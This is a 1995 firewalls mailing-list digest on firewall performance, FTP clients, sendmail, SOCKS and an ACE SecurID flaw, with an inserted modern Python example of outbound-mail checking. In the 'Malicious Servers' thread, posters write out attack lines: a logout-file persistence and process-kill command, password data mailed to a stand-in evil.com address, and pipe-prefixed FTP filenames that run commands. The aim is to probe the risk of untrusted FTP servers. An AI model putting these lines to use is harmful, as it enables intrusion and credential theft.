The configuration of the firewall is configured as a screened_host_gateway. We
have a separate class C segment off of our class B net. The router is setup to
route from the class B to C unhampered traffic; all traffic going through the
router is by the firewall proxies. Also host_A and host_B are on the class C,
host_C is on the class B. (I hope I didn't lose anybody here).

One more issue, the router we are using is only configured with 1 meg of
memory, and it is an ancient AGS cisco. So this could be a bottleneck but not
to much extent because host_C traffic did not go through the router, just
through the firewall.

The only tuning I did was to tune the MAXUSERS to 129 because the tuning on
BSDI works like this:

  if MAXUSERS < 64                          set clusters equal to some_size
  if MAXUSERS >= 64 clusters less than 128  set bufs equal to some_size_bigger
  if MAXUSERS > 128                         set clusters equal to some_size_even_bigger

So I chose to use MAXUSERS to 129 to use the bigger kernel clusters.

We feel that with the addition of level 2 cache (256K) these measurements will
go up. When we receive the cache we will re-run these benchmarks.

steve payne
spayne@dsac.dla.mil
comm 614-692-9991

From firewalls-owner Tue May 16 14:01:38 1995
Date: Tue, 16 May 1995 15:31:01 -0600
To: firewalls@GreatCircle.COM
From: nall@zilker.net (Joe Nall)
Subject: Re: Firewall performance from neal nelson RTE

>I promised the report from the neal nelson rte to the group
>when we had stats available. We had the performance measurement
>group run the benchmarks on our firewall and here's what we got.
...
>The firewall can accommodate 65 concurrent users with response time of 40
>seconds per rlogin, and 420 non-concurrent users over 80 minutes with response
>time of 28 seconds per rlogin.

Is that the firewall limit or the limit of the hosts you are logging into?
Don't you need a test without the firewall to determine the firewall's impact?
Still curious, joe nall - nall@nosc.mil, nall@zilker.net From firewalls-owner Tue May 16 14:31:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA28810 for firewalls-outgoing; Tue, 16 May 1995 14:29:28 -0700 Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA28803 for ; Tue, 16 May 1995 14:29:24 -0700 Received: from uranus ([13.242.56.22]) by alpha.xerox.com with SMTP id <14479(4)>; Tue, 16 May 1995 14:28:54 PDT Received: from altar by uranus (4.1/{XSoftHUB-1.2}SMI-4.1) id AA06711; Tue, 16 May 95 14:28:45 PDT Received: by altar (4.1/{XSoft-U1-1.0}SMI-4.1) id AA03515; Tue, 16 May 95 14:28:36 PDT Date: Tue, 16 May 1995 14:28:36 PDT From: meza@xsoft.xerox.com (Jose' M. Salas-Meza) Message-Id: <9505162128.AA03515@altar> To: firewalls@greatcircle.com Subject: Are there any Free SLIP Software packages available for SunOS4.1.3_u1? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm looking to test out some free SLIP software packages on my 4.1.3_u1 Sun Sparc IPX System. The problem is that I don't have any. So can anyone point me to locations where I can pick some up from? Also, Are there any good ones out there? Are there any ones that I should avoid? Thanks, Jose' M. 
Salas-Meza
------------------------------------------------------------
meza@xsoft.xerox.com
Xerox - XSoft (Palo Alto CA)

From firewalls-owner Tue May 16 15:32:12 1995
From: Ron DuFresne
Date: Tue, 16 May 1995 17:07:48 -0500 (CDT)
To: Rick Smith
Cc: firewalls@greatcircle.com, smith@sctc.com
Subject: Re: Monitoring outgoing traffic

On Tue, 16 May 1995, Rick Smith wrote:

> I wrote:
>
> >>At the very least, a responsible organization will monitor outgoing traffic
> >>in some fashion to provide confidence that people comply with information
> >>protection policies.
>
> David M Funk replied:
>
> >Our organization has proprietary information that is not releasable to the
> >public. This information resides in desks and computers. We do not monitor
> >the briefcases and pockets of employees leaving the building. Are you
> >saying that this is not a responsible organization. I think not
>
> I don't generally think of my pocket or briefcase as being a forum
> for the "public release" of information. The Internet is.
>
> Besides, computers and people have different trust properties.
>
> How often do you stick a sensitive document in a briefcase or pocket
> by accident? Rarely, I expect.
> But even if you did, you still had
> *lots* of opportunities to discover the error and then protect the
> document from compromise. (thanks, Beede)
>
> On the other hand, a couple of simple mistakes can transmit almost any
> information to the Internet, and even publish it where adversaries
> will see it. Clever adversaries might even manage to fool your
> computers into transmitting sensitive data. And once it's past the
> firewall there's no way you can reliably detect and un-do the mistake
> before it appears in the news.
>
> I don't know of any way to monitor traffic automatically and block bad
> messages with 100% reliability. But some simple checks will catch
> large classes of mistakes and bunglers, which is a real improvement.
>

It seems to me that mistakes and bungles are a sign of poor user training. Even the defense-related corporations I have worked at, who often have a need to share sensitive information with contracting partners and various military sites across the US and abroad. A company policy that outlines how sensitive data is to be transmitted, good user training, and a strongly skilled user help desk/support department are the keys to keeping sensitive data out of the hands of those it is not meant for...not a 'big-brother' mentality.

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

testing, only testing, and damn good at it too!

OK, so you're a Ph.D. Just don't touch anything.
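Rick Smith's point in the exchange above is that simple automated checks on outgoing mail catch large classes of mistakes without claiming 100% reliability. The following is an added example, not code from either poster: an outbound policy check that holds a message only when it both leaves the trusted domains and carries a sensitivity marker. The trusted domain list, the marker phrases and the sample messages are constructed for the example.

```python
"""Outbound mail policy check, as a worked example of the "simple checks" idea.

Constructed example: the trusted domains, the marker phrases and the sample
messages below are made up for illustration.
"""
import re
from email import message_from_string
from email.utils import getaddresses

# Assumption: mail to these domains stays inside the organisation or with
# partners covered by an agreement, so a marker there is not a public release.
TRUSTED_DOMAINS = {"example.com", "partner.example"}

# Assumption: the organisation labels sensitive material with one of these phrases.
MARKERS = re.compile(r"\b(PROPRIETARY|COMPANY CONFIDENTIAL|INTERNAL USE ONLY)\b",
                     re.IGNORECASE)


def external_recipients(msg):
    """Return recipient addresses whose domain is not in TRUSTED_DOMAINS."""
    headers = []
    for name in ("To", "Cc", "Bcc"):
        headers.extend(msg.get_all(name, []))
    external = []
    for _display, addr in getaddresses(headers):
        domain = addr.rpartition("@")[2].lower()
        # An address without a domain, or outside the trusted set, counts as external.
        if domain not in TRUSTED_DOMAINS:
            external.append(addr)
    return external


def find_markers(msg):
    """Return the distinct marker phrases found in the subject and text parts.

    Only text/* parts are inspected; an encoded or binary attachment is not,
    which is one reason a check like this filters mistakes rather than
    guaranteeing anything (the thread's "no 100% reliability" point).
    """
    found = set()
    for m in MARKERS.finditer(msg.get("Subject", "")):
        found.add(m.group(1).upper())
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        text = payload.decode(part.get_content_charset() or "us-ascii",
                              errors="replace")
        for m in MARKERS.finditer(text):
            found.add(m.group(1).upper())
    return sorted(found)


def check_outbound(raw_message):
    """Decide whether a message may leave: 'pass', or 'hold' with the reasons."""
    msg = message_from_string(raw_message)
    external = external_recipients(msg)
    markers = find_markers(msg)
    action = "hold" if external and markers else "pass"
    return {"action": action, "external": external, "markers": markers}


# Constructed sample messages.
INTERNAL_MARKED = """\
From: alice@example.com
To: bob@example.com
Subject: Q3 plan (COMPANY CONFIDENTIAL)

Draft attached, internal use only.
"""

EXTERNAL_MARKED = """\
From: alice@example.com
To: Bob <bob@example.com>
Cc: press@news.example.net
Subject: Q3 plan
Content-Type: text/plain

This document is PROPRIETARY and not releasable to the public.
"""

EXTERNAL_CLEAN = """\
From: alice@example.com
To: friend@news.example.net
Subject: lunch?

Free on Thursday?
"""

if __name__ == "__main__":
    for label, raw in (("internal", INTERNAL_MARKED),
                       ("external", EXTERNAL_MARKED),
                       ("clean", EXTERNAL_CLEAN)):
        print(label, check_outbound(raw))
```

Only the message that is both marked and addressed outside the trusted domains is held; a marked message between trusted addresses and an unmarked external one both pass.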
From firewalls-owner Tue May 16 16:01:38 1995
From: vin@shore.net (Vin McLellan)
Date: Mon, 15 May 1995 17:46:58 -0500
To: firewalls@greatcircle.com
Cc: billcurr@cyberspace.com, Stephen.L.Arnold@Arnold.Com, smoubray@dcc.com, scott@disclosure.com, cbk@ingress.com, pokey@maddie.atlantic.com
Subject: Re: BorderWare (previously "JANUS")

Steve Arnold reported on BorderWare, including the firewall's user authentication options:

>Security tokens are extra. They resell CRYPTOCard challenge-response
>tokens (like me) and Security Dynamics time-synchronization tokens. For
>SecurID, the ACE server runs on the box in the first release. In a
>later release you can use an existing ACE server on your internal net,
>thus having a single security database.

Charles Kaplan offered additional info and added:

>> Crypto Card runs as you say on the box, SecurID still isn't released.
>> It has been announced as under development, and I among others look
>> forward to seeing it later this summer.

My Security Dynamics file includes an April 10 press release in which SDI announced its agreement with Border Network Technologies to provide SecurID tech on BorderWare.

I don't think SDI's ACE Server -- which will transparently support authentication calls through a client on the BorderWare host -- ever "runs on the (firewall) box."
The BorderWare box, which is not straight Unix, certainly does not run it.

Border said it would offer BorderWare with the SecurID hook during Q2, but it isn't yet mentioned as an option on their web server. On schedule, it should be available within the next few weeks. You can bet your job on that, since we all know vendors never slip a deadline.

Suerte,
_Vin

--
Vin McLellan + The Privacy Guild + USA  Tel. (617) 884-5546
Mail: 53 Nichols St., Chelsea, Ma. 02150
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

From firewalls-owner Tue May 16 17:31:35 1995
From: Tim Keanini
Date: Tue, 16 May 1995 17:19:38 -0700 (PDT)
To: firewalls@greatcircle.com
Subject: PASV Mac or Windows Client

I am trying to locate a PASV ftp client for Mac and Windows. I can't use Netscape or Mosaic because this is for uploading files. I checked out the latest Fetch and Anarchie and they both DO NOT do PASV.

If anyone is using such an animal please send mail the URL or just the name of it.

--blast
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Tim Keanini, aka blast | "The limits of my language, are the limits of my world." --Ludwig Wittgenstein
for more info on BayMOO...
email baymoo@worldbit.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Tue May 16 18:31:30 1995
From: Bob Lanning
Date: Tue, 16 May 1995 17:59:24 -0700 (PDT)
To: blast@worldbit.com (Tim Keanini)
Cc: firewalls@greatcircle.com
Subject: Re: PASV Mac or Windows Client

---- As written by Tim Keanini:
>
> I am trying to locate a PASV ftp client for Mac and Windows.
> I can't use Netscape or Mosaic because this is for uploading files.
> I checked out the latest Fetch and Anarchie and they both DO NOT do
> PASV.
>
> If anyone is using such an animal please send mail the URL or just the
> name of it.
>
> --blast

Netscape can use socks/proxies. Configuration is under options->preferences->Mail and Proxies

_________________________________________________________________________
Robert Hajime Lanning | Systems Administrator | TYECIN Systems, Inc.
"No more blah, blah, blah!"
  -- Kirk, "Miri", stardate 2713.6
Four Main Street, Los Altos, California 94022
Voice: (415) 949-8501  Fax: (415) 949-8505  E-Mail: lanning@tyecin.com
"Software Tools for Manufacturing Management"
"Emotions are alien to me. I'm a scientist." -- Spock, "This Side of Paradise", stardate 3417.3
_________________________________________________________________________

From firewalls-owner Tue May 16 19:01:19 1995
From: John Scudder
Date: Tue, 16 May 1995 21:36:46 -0400 (EDT)
To: blast@worldbit.com (Tim Keanini)
Cc: firewalls@GreatCircle.COM
Subject: Re: PASV Mac or Windows Client

> I am trying to locate a PASV ftp client for Mac and Windows.
> I can't use Netscape or Mosaic because this is for uploading files.
> I checked out the latest Fetch and Anarchie and they both DO NOT do
> PASV.

Actually, Anarchie does do PASV. To enable it: under Edit, choose "Firewalls". This will bring up a dialog box with a checkbox to turn on PASV.

Happy FTP'ing.
--John Scudder
Ameritech Advanced Data Services

From firewalls-owner Tue May 16 19:24:31 1995
From: Tom Fitzgerald
Date: Tue, 16 May 1995 21:47:48 -0400
To: firewalls@greatcircle.com
Subject: NTP on a bastion system

mitubori@tsi.co.jp writes:
> Does anyone know of and have experience with some tools that
> relay traffic back and forth between two NTP servers?
> They must run on a bastion system (FWTK, SunOS4.1.4).

For that platform the best ntp packet forwarder is xntpd.... If there's some reason you can't run it, udprelay can do this.

ftp.wang.com:/pub/fitz/udprelay-0.2.tar.Z

udprelay is mainly useful on platforms like SCO where the system clock is so shaky that xntpd can't be used to feed the time to other systems reliably.
--
Tom Fitzgerald  1-508-967-5278  Wang Labs, Lowell MA, USA  fitz@wang.com

From firewalls-owner Tue May 16 19:31:16 1995
From: Edward Maillet
Date: Tue, 16 May 1995 22:02:49 -0400 (EDT)
To: firewalls@greatcircle.com
Subject: Malicious Servers. Do clients guard against? (FTP example)

Hey All,

I've got another question for you all. Malicious (sp?) Servers. Do client programs (or proxies) look for attacks against the client? Here's a sample of what I mean. This example is FTP but could easily apply to HTTP if I read the spec right.

Suppose I at me.com have (for whatever reason) a malicious FTP server that tries to get the client to "get" files it didn't ask for. These file(s) are, say, basic trojan horses for normal commands (ls, copy, etc.). If I can "convince" your client to get these files and you execute the "trojan'd" command in the right directory (or have it in the path) Wham! (or something more subtle)

Here are the details of how I'd do it:

The mget command for FTP issues (among other things) an NLST command which requests from the server a list of file names. An "mget *.ps" generates an NLST *.ps. The client then retrieves each of the files in the list.
Would your FTP client notice if in the returned list of file names some names don't match the *.ps request? Do clients or proxies guard against this kind of attack?

-----
Ed Maillet
maillet@usmcs.maine.edu

From firewalls-owner Tue May 16 19:45:57 1995
From: Rick Romkey
Date: Tue, 16 May 1995 21:35:40 -0400 (EDT)
To: vin@shore.net (Vin McLellan)
Cc: firewalls@GreatCircle.COM, billcurr@cyberspace.com, Stephen.L.Arnold@Arnold.Com, smoubray@dcc.com, scott@disclosure.com, cbk@ingress.com
Subject: Re: BorderWare (previously "JANUS")

>
> My Security Dynamics file includes an April 10 press release in which SDI
> announced its agreement with Border Network Technologies to provide
> SecurID tech on BorderWare.
>
> I don't think SDI's ACE Server -- which will transparently support
> authentication calls through a client on the BorderWare host -- ever "runs
> on the (firewall) box." The BorderWare box, which is not straight Unix,
> certainly does not run it.

Last I heard, the BorderWare firewall will support the ACE Server as a client when it is released. The reason it won't run local on the server itself is mainly to keep costs down.

For the record, BorderWare IS straight Unix...you just don't get any (or little) access to it.
> Border said it would offer BorderWare with the SecurID hook during Q2, but
> it isn't yet mentioned as an option on their web server. On schedule, it
> should
> be available within the next few weeks. You can bet your job on that,
> since we all know vendors never slip a deadline.

No comment! 8^).

-Rick

From firewalls-owner Tue May 16 19:46:47 1995
From: Tim Keanini
Date: Tue, 16 May 1995 18:47:20 -0700 (PDT)
To: Bob Lanning
Cc: firewalls@greatcircle.com
Subject: Re: PASV Mac or Windows Client

On Tue, 16 May 1995, Bob Lanning wrote:

> ---- As written by Tim Keanini:
> > I am trying to locate a PASV ftp client for Mac and Windows.
> > I can't use Netscape or Mosaic because this is for uploading files.
> > I checked out the latest Fetch and Anarchie and they both DO NOT do
> > PASV.
> > If anyone is using such an animal please send mail the URL or just the
> > name of it.
> Netscape can use socks/proxies. Configuration is under
> options->preferences->Mail and Proxies

My second line states that I need it to send files outbound. There is no way that I know of to 'STOR' a file with Netscape or Mosaic.

--blast
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Tim Keanini, aka blast | "The limits of my language, are the limits of my world."
  --Ludwig Wittgenstein
for more info on BayMOO... email baymoo@worldbit.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Tue May 16 20:03:35 1995
From: Jeff Murphy
Date: Tue, 16 May 1995 22:50:38 -0400 (EDT)
To: maillet@doc.usmcs.maine.edu (Edward Maillet)
Cc: firewalls@GreatCircle.COM
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)

Edward Maillet writes:
>Here are the details of how I'd do it:
>The mget command for FTP issues (among other things) an NLST command which
>requests from the server a list of file names. An "mget *.ps" generates an
>NLST *.ps. The client then retrieves each of the files in the list.
>Would your FTP client notice if in the returned list of file names some
>names don't match the *.ps request?

assuming this happens, how would this affect the end user? i'm assuming that the ftp daemon ships over a bunch of *.ps files and also something called "ls", in hopes that you have the current dir as the first item in your path and that you quit and type "ls"...
for this to work you need to know the OS that you are sending the files to. another problem is that files brought over won't (for unix at least) be executable at first... am i missing your point? what other security aspects are there to shipping over a file that wasn't requested?

jeff

From firewalls-owner Tue May 16 22:01:15 1995
From: "Peter C. Norton"
Date: Wed, 17 May 95 0:38:04 EDT
To: jcmurphy@smurfland.cit.buffalo.edu (Jeff Murphy)
Cc: firewalls@greatcircle.com
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)

> >requests from the server a list of file names. An "mget *.ps" generates an
> >NLST *.ps. The client then retrieves each of the files in the list.
> >Would your FTP client notice if in the returned list of file names some
> >names don't match the *.ps request?

> i'm assuming that the ftp daemon ships over a bunch of *.ps
> files and also something called "ls", in hopes that you
> have the current dir as the first item in your path and that
> you quit and type "ls"...

All right.
substitute .profile and .cshrc and .zshrc and .script for ls and have a quick test for sed and awk or perl on the user's next logout (won't work the first time, of course) and depending on what the server's owner likes to hack in, something like

echo "ps | grep sh | kill -9 -" >> ~/.logout; ln ~/.logout ~/.bash_logout
 # or whatever shell[s] someone would want to accommodate
echo "sh .script" >> .logout;

where sh is a little shell script that can check for perl, or any number of other scripting languages, open an ftp connection to the original host, get the right script, and then execute it. the new script automagically runs passwd, and voila... broken system. grep $USER | mail ftp@evil.com. if there are no shadow passwords then ftp@evil can verify the password from the sent mail, and mailing allows for ftp@evil.com to know where he wants to spend his next few hours.

I know that what I'm saying is unix specific, but it's not hard to target a specific platform. How many times do you think that a windows user has downloaded from a /pub/src/linux or /pub/archives/comp/sources/unix. And how many root users on unix boxes download from the /pub/mswin or /pub/os9 directories?

I just checked my local default ftp and found that it can expand the ~ in the local file field for a get, which to me means that it should do the same thing if mget returned ~/.login or something. And if not, most unix users don't alias ls to ls -a.

Anyway, I think I've answered the "how can you assume that a specific platform can be targeted per attack" and the "how to get a file executed" questions. I think that every os I know has a default set of startup files that can be written to. On a Mac it could overwrite the users and groups prefs file. And if you're root on a unix system, this seems to be a golden attack.

There's got to be something that makes this untenable, or it would have happened a long time ago. I think. I don't consider myself a guru, but I can understand how this attack can happen.
should we start to look out for it?

-|-Peter

From firewalls-owner Tue May 16 22:31:56 1995
From: jim@california.sandia.gov (Jim Hutchins)
Date: Tue, 16 May 1995 22:30:04 -0700
To: jcmurphy@smurfland.cit.buffalo.edu, spacey@cyber.zone.net
Cc: firewalls@greatcircle.com
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)

>> >requests from the server a list of file names. An "mget *.ps" generates an
>> >NLST *.ps. The client then retrieves each of the files in the list.
>> >Would your FTP client notice if in the returned list of file names some
>> >names don't match the *.ps request?
>
>All right. substitute .profile and .cshrc and .zshrc and .script
>for ls and have a quick test for
>sed and awk or perl on the user's next logout (won't work the first
>time, of course) and depending on what the server's owner likes
>to hack in, something like
>echo "ps | grep sh | kill -9 -" >> ~/.logout; ln ~/.logout ~/.bash_logout
> # or whatever shell[s] someone would want to accommodate
>echo "sh .script" >> .logout;
>
> [...]
>
>I know that what I'm saying is unix specific, but it's not hard to target
>a specific platform.

Why be so indirect. Just have the server return a filename of "|some_command and args". Most UNIX ftp clients will happily take it and run the command right then and there.
You can even do something simple like a "sh" and send the shell script over in the data ftp transfers to save to this "file".

The basic problem is a client trusting information returned from an untrusted server and acting upon it without user oversight. It applies as much to ftp with an mget as it does to http grabbing a Postscript file containing embedded commands.

----------------------------------------------------------------
James A. Hutchins                Phone: 1-510-294-2416
Sandia National Laboratories     FAX:   1-510-294-1225
P.O. Box 969, MS9011             EMail: jim@ca.sandia.gov
Livermore, CA 94551-0969

From firewalls-owner Wed May 17 00:01:16 1995
From: Alan Hannan
Date: Wed, 17 May 1995 01:33:32 -0500 (CDT)
To: firewalls@greatcircle.com
Subject: Sendmail Question

I have a question regarding sendmail configuration over a firewall. This firewall is using smap to receive mail, and sendmail to send the outgoing mail.

The topology looks something like the following:

  Untrusted                     Trusted
  World ---- Firewall ----- Mailhost -- PostOffice1
                                   |
                                   +---- PostOffice2
                                   |
                                   +---- PostOffice3

We want the following to happen:

All mail from the internal trusted hosts will arrive at the Firewall with destination addresses and from addresses.
We want all outgoing mail to appear to be originating from user@domain.name (ie user@foo.com). This will require the outgoing from header to be rewritten.

We want all incoming mail to the Firewall to parse through an aliases file which may rewrite the outgoing email address. Also, all mail destined for the internal network will be handed off to the internal Mailhost.

The Mailhost is not intelligent enough to rewrite headers, so we must rewrite the headers with the firewall such that it identifies to which post office the mail is destined. I realize this is not a normal function of a fw, however this is going to have to be as such.

---

Two things. Rewrite To headers based on an aliases file, and rewrite outgoing from addresses if they are NOT to a set of hosts.

I can make the outgoing headers be rewritten, however it will then change the destination addresses within the domain to user@domain.name.

I can make the sendmail parse the aliases file and hand it off to the mailhost correctly, but then mail that "replies" to sent mail from the internal hosts is destined for user@PostOfficeX.domain.name, instead of user@domain.name.

I could use MX records to make PostOfficeX.domain.name have two destinations, firewall and mailhost, with mailhost a higher priority, to "hop" it through, however this is not preferred.

I have struggled with this for some time, and have not been able to figure out how to do it. Any help appreciated. I apologize if this is too narrow of a concern, though I can see this configuration being of use in many firewall configurations.
--
Alan Hannan  alan@mid.net

From firewalls-owner Wed May 17 00:31:23 1995
From: "Ricardo Pereira"
Organization: CCAE
Date: Wed, 17 May 1995 09:26:10 +0000
To: Firewalls@GreatCircle.COM
Reply-To: ricardo.pereira@inesc.pt
Subject: Info on proxy servers

From what I know, though I have never implemented it myself, you could use socks. For that you would need the following setup:

- Renumber your internal network to use RFC 1597 reserved address space. Notice that not all machines would have to be renumbered, only those that would require access to the Internet. This address space has at least a class A and several class Bs, which should be enough for most cases.

- Use clients that support socks. I am not too familiar with Mac products, but in the PC arena there are some applications supporting this: Trumpet, Netscape 1.1, PC/TCP(?),... In the Unix case all you would need is to compile the new clients included with the socks distribution.

- Install a Socks server having 2 IP addresses: one legal, and the other from the class selected from RFC1597.

This thing works based on the following. Applications using socks don't see IP addresses as associated with an interface, and so valid Internet addresses must not match with the IP you are in.
They simply transport that information to a server they know.

Now you would have to watch out for something:

- If you renumber all of the internal network, no problem.
- If you don't, then you must ensure that when you talk to other internal addresses you don't go by socks, but when you refer to the Internet you go!

This may be simple if you impose something like: all external access must be through Netscape, and no internal access is done with Netscape. That way the only point of "socksifying" is a single application.

Because this matter is tricky, I would like to hear from you if you reach some different possibilities.

TIA,
Ricardo
__________________________________________________________________
Ricardo Jorge Pereira
Network Consultant
Centro de Comunicacoes em Ambientes Empresariais
Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal
Telef : +351 1 3100069   Fax : +351 1 3100068
email : ricardo.pereira@inesc.pt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft is not the answer, Microsoft is the question. No is the answer.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Wed May 17 03:01:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA12415 for firewalls-outgoing; Wed, 17 May 1995 02:49:09 -0700 Received: from edelweb.fr (edelweb.fr [193.51.12.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA12410 for ; Wed, 17 May 1995 02:49:03 -0700 Received: from champagne.edelweb.fr (champagne.edelweb.fr [193.51.12.33]) by edelweb.fr (8.6.10/8.6.9) with ESMTP id LAA01054; Wed, 17 May 1995 11:48:44 +0200 Received: from localhost (touvet@localhost) by champagne.edelweb.fr (8.6.10/8.6.6) with SMTP id LAA05881; Wed, 17 May 1995 11:48:42 +0200 Message-Id: <199505170948.LAA05881@champagne.edelweb.fr> To: ari@soscorp.com (Ari Shamash) Cc: Scott Barman , firewalls@greatcircle.com Subject: Re: Requesting "echo" In-reply-to: <199505161838.OAA13270@fearless.soscorp.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 May 1995 11:48:27 +0200 From: Jean-Christophe Touvet Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Not blocking the echo port (port 7) or somehow preventing packets with > spoofed IP addresses from entering the system could be even more > disasterous to a site. Consider this scenario: > > A packet enters the network with a spoofed IP address (say of the > backup server), with source port 514 (port for remote shell), and the > payload consisting of a valid RSH-type "header" and content. This > packet then gets echoed back to the backup server with the IP source > address of the client. If the server trusts this host (and most > backup hosts must, so remote dumps can happen), then what? Hmm, I'm not sure it would be such easy with TCP services. But there is at least one very annoying attack with UDP echo: send a spoofed UDP packet with both source and destination port=7. Guess what ? 
-JCT-

From firewalls-owner Wed May 17 03:31:26 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA12516 for firewalls-outgoing; Wed, 17 May 1995 03:04:25 -0700
Received: from death.netsys.com (death.netsys.com [204.160.179.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA12511 for ; Wed, 17 May 1995 03:04:22 -0700
Received: (from len@localhost) by death.netsys.com (8.6.10/HQ-Len) id DAA00274 for firewalls@GreatCircle.COM; Wed, 17 May 1995 03:03:40 -0700
From: len@NETSYS.COM (Len Rose)
Message-Id: <9505170303.ZM272@death.netsys.com>
Date: Wed, 17 May 1995 03:03:39 -0700
X-Phone: 415-528-7205
X-Mailer: Z-Mail (2.1.5 20sep93)
To: firewalls@GreatCircle.COM
Subject: ACE SecureID Flaw (SunOS 4.1.x)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Has anyone noted that ACE has linked their code against /usr/5lib/libc.so.2.9, which unfortunately has the braindead resolver (NIS/hosts)? This has critical ramifications for anyone who is smart enough to avoid NIS within/without their networks. Unfortunately, when I tried to explain the ramifications of this to their tech support folks, they didn't seem to understand why it was a problem. They need to get with the program and link against the real resolver routines in libc.so.1.9.x that use BIND (or at least offer 2 versions of the binaries). This may not be a critical problem for sites with a handful of hosts, but when you have a few thousand machines or routers..

*sigh*

Len

(ldd aceserver)
        -lc.2 => /usr/5lib/libc.so.2.9
        -ldl.1 => /usr/lib/libdl.so.1.0

ldd sdshell
        -lkvm.0 => /usr/lib/libkvm.so.0.3
        -lc.2 => /usr/5lib/libc.so.2.9
        -ldl.1 => /usr/lib/libdl.so.1.0

ldd sdadmin
        -lc.2 => /usr/5lib/libc.so.2.9
        -ldl.1 => /usr/lib/libdl.so.1.0

From firewalls-owner Wed May 17 03:50:06 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA12931 for firewalls-outgoing; Wed, 17 May 1995 03:30:58 -0700
Received: from madiran.icdc.fr (madiran.icdc.fr [192.134.193.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA12925 for ; Wed, 17 May 1995 03:30:51 -0700
Received: from gis ([158.156.97.7]) by madiran.icdc.fr (8.6.10/8.6.9) with ESMTP id LAA07744 for ; Wed, 17 May 1995 11:39:38 +0200
Received: from hal9000.icdc.fr (hal9000 [158.156.97.254]) by gis (8.6.10/8.6.10) with SMTP id LAA23234 for ; Wed, 17 May 1995 11:35:48 +0200
Received: by hal9000.icdc.fr (5.0/SMI-SVR4) id AA03974; Wed, 17 May 1995 11:37:45 +0200
Date: Wed, 17 May 1995 11:37:45 +0200
From: ct@gis.icdc.fr (Christian Tournaire)
Message-Id: <9505170937.AA03974@hal9000.icdc.fr>
To: firewalls@GreatCircle.COM
Subject: PPP or SLIP package for Sun Sparc
X-Sun-Charset: US-ASCII
content-length: 254
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I am looking for a free SLIP package or a free PPP package for SunOS 4.1.3, or possibly Solaris 2.x, running on sparc2 and sparc10 architecture. Does somebody know where I can ftp such a package?
Thanks, bye

ct@gis.icdc.fr
Christian TOURNAIRE

From firewalls-owner Wed May 17 05:31:49 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14622 for firewalls-outgoing; Wed, 17 May 1995 05:19:35 -0700
Received: from alcapone.cnes.fr (alcapone.cnes.fr [132.149.22.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14614 for ; Wed, 17 May 1995 05:19:30 -0700
Received: from paclas01.siege.cnes.fr (paclas01.siege.cnes.fr [132.149.253.197]) by alcapone.cnes.fr (8.6.12/RH-19950308.01) with ESMTP id OAA01242 for ; Wed, 17 May 1995 14:18:26 +0200
Received: from paocr05 (paocr05 [132.149.251.50]) by paclas01.siege.cnes.fr (8.6.9/MH-94081601) with SMTP id OAA01162 for ; Wed, 17 May 1995 14:21:21 +0200
Message-Id: <199505171221.OAA01162@paclas01.siege.cnes.fr>
X-Sender: salome@paclas01.siege.cnes.fr
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 17 May 1995 14:20:22 +0200
To: firewalls@GreatCircle.COM
From: Eric.Salome@siege.cnes.fr (Eric Salomé)
Subject: Re: Malicious Servers. Do clients guard against? (FTP example)
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Edward Maillet writes:
>>Here are the details of how I'd do it:
>>The mget command for FTP issues (among other things) an NLST command which
>>requests from the server a list of file names. An "mget *.ps" generates an
>>NLST *.ps. The client then retrieves each of the files in the list.
>>Would your FTP client notice if in the returned list of file names some
>>names don't match the *.ps request?
>
> assuming this happens, how would this affect the end user?
> i'm assuming that the ftp daemon ships over a bunch of *.ps
> files and also something called "ls", in hopes that you
> have the current dir as the first item in your path and that
> you quit and type "ls"...
>
> for this to work you need to know the OS that you are sending
> the files to. another problem is that files brought over won't
> (for unix at least) be executable at first...
>
> am i missing your point? what other security aspects are there
> to shipping over a file that wasn't requested?
>
>jeff

